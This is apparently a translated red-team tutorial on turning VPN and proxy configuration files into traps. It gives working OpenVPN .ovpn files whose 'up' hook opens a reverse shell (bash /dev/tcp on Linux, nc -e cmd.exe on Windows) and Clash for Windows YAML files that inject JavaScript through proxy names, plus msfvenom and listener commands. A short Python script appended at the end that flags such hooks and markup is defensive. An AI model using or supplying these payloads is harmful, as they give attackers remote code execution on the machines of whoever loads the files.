I. OpenVPN counter-attack

OpenVPN is a common VPN service. Obtaining a VPN configuration file through an information leak, a vulnerability or phishing, and using it to connect straight into the internal network, is a technique red teams use often in penetration tests.

1.1 Linux

  • Forge an OpenVPN configuration file, 1.ovpn
remote 192.168.31.137
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.43.128/9090 0<&1 2>&1&'"

None of the IP addresses above need to change except the one after tcp/ in the up line: set it to the Kali box or a cloud server, which catches the reverse shell and runs commands.

openvpn --config 1.ovpn
nc -lvvp 9090


1.2 Windows

Windows has no bash, and the PowerShell command for a reverse shell is very long; since OpenVPN limits the configuration file to 256 characters, there is no working method for Windows yet.

There is of course an exception: if the attacker's machine to be countered has nc installed, the Windows OpenVPN counter-attack works as well (there are many other approaches, such as luring them into downloading and running a remote-control trojan). On Windows Server 2016, download nc and copy it to C:\windows\system32.


  • Start a listener on Kali
nc -lvvp 12333


  • Lure the Windows Server 2016 host into connecting to the VPN with the following .ovpn file
ifconfig 10.200.0.2 10.200.0.1
dev tun
remote 192.168.1.245
script-security 2
up 'C:\\Windows\\System32\\nc.exe 192.168.43.128 12333 -e cmd.exe'

Likewise, replace the IP address in the last line with Kali's IP address.


The listener receives the reverse shell from Windows.


II. Clash counter-attack

Clash for Windows below 0.19.08


2.1 Editing the configuration file

Mind the YAML file's formatting, otherwise problems are easy to run into.

free_node.yaml

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: ':9090'
proxies:
- { name: <img src=# onerror="require('child_process').exec('calc');">, type: vmess, server: 123, port: '29999', uuid: B00EC15A-B535-411D-95D6-CAEA028C477F, alterId: 0, cipher: auto, udp: false }
proxy-groups:
- { name: '🚀 节点选择', type: select, proxies: [<img src=# onerror="require('child_process').exec('calc');">] }

python3 -m http.server 10002


Load the configuration file and select the node; the calculator pops up, confirming code execution.

2.2 Reverse shell

  • Generate a Node.js reverse-shell payload on Kali

    msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.43.128 LPORT=12333 -f base64

    192.168.43.128 is Kali's address


port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: "<details ontoggle=eval(atob('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')); open=></details>"
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
  • Write out the YAML file above


  • Serve the file on a port
python3 -m http.server 10002


  • Listen on the port
nc -lvnp 12333


  • Download the node file in Clash


The reverse shell is received.
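As an added defender-side example (not part of the original post), a small Python audit that flags the two tricks used in sections I and II before an untrusted config is loaded: OpenVPN command hooks made live by script-security 2, and HTML or JavaScript fragments inside Clash proxy names. The sample configs in the block are constructed, with a harmless hook path in place of a payload.

```python
import re

# OpenVPN directives that hand control to an external command or script.
OVPN_HOOKS = {"up", "down", "ipchange", "route-up", "route-pre-down",
              "client-connect", "client-disconnect", "learn-address",
              "auth-user-pass-verify", "tls-verify"}

# Fragments that never belong in a proxy name: tags, event handlers, JS calls.
MARKUP = re.compile(r"<[a-z!/]|\bon[a-z]+\s*=|require\(|eval\(|atob\(", re.I)


def audit_ovpn(text):
    """Return findings for an .ovpn string; an empty list means nothing suspicious."""
    findings, script_security = [], 0
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.strip().split(None, 1)
        if not parts or parts[0].startswith(("#", ";")):
            continue
        key, arg = parts[0].lower(), (parts[1] if len(parts) > 1 else "")
        if key == "script-security" and arg[:1].isdigit():
            script_security = int(arg[0])
        elif key in OVPN_HOOKS:
            findings.append(f"line {n}: '{key}' runs an external command: {arg}")
    # Hooks only fire when script-security is 2 or higher; say so up front.
    if findings and script_security >= 2:
        findings.insert(0, f"script-security {script_security} lets those hooks execute")
    return findings


def audit_clash(text):
    """Return findings for a Clash YAML string (flow and block style alike)."""
    return [f"line {n}: markup in config: {line.strip()[:70]}"
            for n, line in enumerate(text.splitlines(), 1) if MARKUP.search(line)]


# Constructed samples modelled on the post's configs, with a harmless hook path.
BAD_OVPN = """remote 192.0.2.10
dev tun
script-security 2
up "/tmp/after-connect.sh"
"""
OK_OVPN = "remote 192.0.2.10\ndev tun\ncipher AES-256-GCM\n"
BAD_CLASH = """proxies:
- { name: "<details ontoggle=alert(1) open>", type: socks5, server: 127.0.0.1, port: "1080" }
- name: abc
  type: socks5
"""

if __name__ == "__main__":
    for label, result in (("ovpn", audit_ovpn(BAD_OVPN)), ("clash", audit_clash(BAD_CLASH))):
        print(label, "->", "\n  ".join(result) or "clean")
```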
